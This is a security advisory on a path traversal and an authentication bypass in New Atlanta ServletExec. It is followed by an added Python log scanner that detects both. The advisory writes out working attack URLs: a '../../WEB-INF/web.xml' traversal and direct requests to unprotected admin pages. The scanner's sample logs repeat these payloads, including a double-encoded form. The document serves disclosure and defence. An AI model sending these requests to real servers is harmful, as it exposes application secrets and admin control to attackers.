New Atlanta Servlet Exec allows for the reading of system configuration files and unauthorized access to system information.
Minded Security Labs: Advisory #MSA260209
Servlet Exec Multiple Security Issues
Tested Versions:
Servlet Exec 5.0p06 on Microsoft IIS 6.0
Minded Security ReferenceID:
MSA260209
Credits:
Discovery by
Stefano Di Paola and Giorgio Fedon of Minded Security
Stefano Di Paola stefano.dipaola [_at_] mindedsecurity.com discovered the
first issue (Path Traversal) and
Giorgio Fedon giorgio.fedon [_at_] mindedsecurity.com discovered the second
issue (Authentication Bypass)
Severity:
High: Attackers may be able to read application secrets stored in configuration
files or to bypass authentication on the Servlet Exec administrative interface.
Solution:
Update your installation with the July 2010 hotfix:
http://www.newatlanta.com/c/products/servletexec/download/hotfix/showHotfixes
Summary
During a penetration test, Minded Security consultants discovered that New Atlanta
Servlet Exec may allow an unauthenticated user to read system configuration files or
to access system information without valid credentials.
Analysis
First Issue: Path Traversal
Minded Security consultants were able to access arbitrary files on the ServletExec
system path by abusing a flaw in the administration help of the ServletExec platform.
In fact, by requesting the following URL:
http://<webserver>/servlet/pagecompile._admin._helpContent_xjsp?page=../../WEB-INF/web.xml
it is possible to download the "web.xml" file of an application.
Second issue: Authentication Bypass
Furthermore, we discovered that some functionality of the Servlet Exec
Administrative Interface can be accessed without any valid user credentials.
By supplying a properly crafted request to the servlet interface, it is possible
to directly access the precompiled JSP pages stored inside the "Servlet Exec
Admin" package.
The following request will display the login interface:
http://<webserver>/servlet/pagecompile._admin._login_xjsp
It is important to note that direct access to the Servlet Exec administrative
functionality may lead to full system compromise if the attacker is able to
deploy their own code in the protected environment.
The following request will show the system properties:
http://<webserver>/servlet/pagecompile._admin._vmSystemProperties_xjsp
Other examples include unauthorized access to the "Log Configuration" section:
http://<webserver>/servlet/pagecompile._admin._SELogging_xjsp
Unauthorized access to Administrative User Management panel:
http://<webserver>/servlet/pagecompile._admin._userMgt_xjsp
Access to virtual server management:
http://<webserver>/servlet/pagecompile._admin._virtualServers_xjsp
Access to Admin Optional packages configuration section:
http://<webserver>/servlet/pagecompile._admin._optionalPackages_xjsp
Access to Data Sources configuration section:
http://<webserver>/servlet/pagecompile._admin._dataSources_xjsp
Access to Admin Debug configuration section:
http://<webserver>/servlet/pagecompile._admin._debug_xjsp
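As an added example (not part of the Minded Security advisory), the following Python scanner flags both issues described above in IIS W3C extended log lines: any direct request to a precompiled admin page under /servlet/pagecompile._admin._ (the authentication bypass), and a ".." segment in the helpContent "page" parameter (the path traversal), including the double-encoded form. The field names cs-uri-stem, cs-uri-query and c-ip are standard IIS W3C fields; the log lines themselves are constructed.

```python
import re
from urllib.parse import unquote

# Precompiled JSPs of the ServletExec admin package live under this prefix
# (the URLs quoted in the advisory); IIS matches paths case-insensitively.
ADMIN_PAGE = re.compile(r"/servlet/pagecompile\._admin\._", re.IGNORECASE)
# A ".." path segment with either slash style, anywhere in the value.
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")

def decode_twice(value):
    """Undo up to two layers of percent-encoding so %252e%252e reads as '..'."""
    return unquote(unquote(value))

def traversal_in_page_param(query):
    """True if a 'page' parameter (the helpContent input) carries a '..' segment."""
    for part in query.split("&"):
        key, _, val = part.partition("=")
        if key.lower() == "page" and TRAVERSAL.search(decode_twice(val)):
            return True
    return False

def classify(cs_uri_stem, cs_uri_query):
    """Return the findings for one request; an empty list means no match."""
    findings = []
    stem = decode_twice(cs_uri_stem)
    if ADMIN_PAGE.search(stem):
        findings.append("direct-admin-page")  # second issue: authentication bypass
        if "helpcontent" in stem.lower() and traversal_in_page_param(cs_uri_query):
            findings.append("help-path-traversal")  # first issue: path traversal
    return findings

def scan_iis_log(lines):
    """Parse W3C extended log lines using their #Fields header; return (ip, stem, findings)."""
    fields, hits = None, []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.strip() and not line.startswith("#") and fields:
            row = dict(zip(fields, line.split()))
            found = classify(row.get("cs-uri-stem", ""), row.get("cs-uri-query", "-"))
            if found:
                hits.append((row.get("c-ip"), row.get("cs-uri-stem"), found))
    return hits

# Constructed sample log: addresses, timestamps and the non-matching paths are made up.
SAMPLE_LOG = """#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2010-07-01 10:00:01 192.0.2.10 GET /index.jsp - 200
2010-07-01 10:00:05 192.0.2.20 GET /servlet/pagecompile._admin._helpContent_xjsp page=../../WEB-INF/web.xml 200
2010-07-01 10:00:09 192.0.2.20 GET /servlet/pagecompile._admin._vmSystemProperties_xjsp - 200
2010-07-01 10:00:12 192.0.2.30 GET /servlet/PageCompile._Admin._helpContent_xjsp page=%252e%252e/%252e%252e/WEB-INF/web.xml 200
2010-07-01 10:00:15 192.0.2.40 GET /admin/login.jsp - 200
""".splitlines()
```

Calling scan_iis_log(SAMPLE_LOG) returns three hits; a 200 status on any of them from a host that is not a known administrator is a strong indicator that the unpatched interface was reached.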
Disclosure Timeline
26/02/2009 Issue found
29/04/2010 Reported to Vendor
Disclaimer
The information within this paper may change without notice. Use
of this information constitutes acceptance for use in an AS IS
condition. There are NO warranties with regard to this information.
In no event shall the author be liable for any damages whatsoever
arising out of or in connection with the use or spread of this
information.
Any use of this information is at the user's own risk.
Permission is hereby granted for the redistribution of this Alert
electronically. It is not to be edited in any way without express
consent of Minded Security Research Lab. If you wish to reprint the
whole or any part of this Alert in any other medium excluding
electronic medium, please e-mail research_at_mindedsecurity.com
for permission.
Copyright (c) 2010 Minded Security, S.r.l.
All rights reserved worldwide.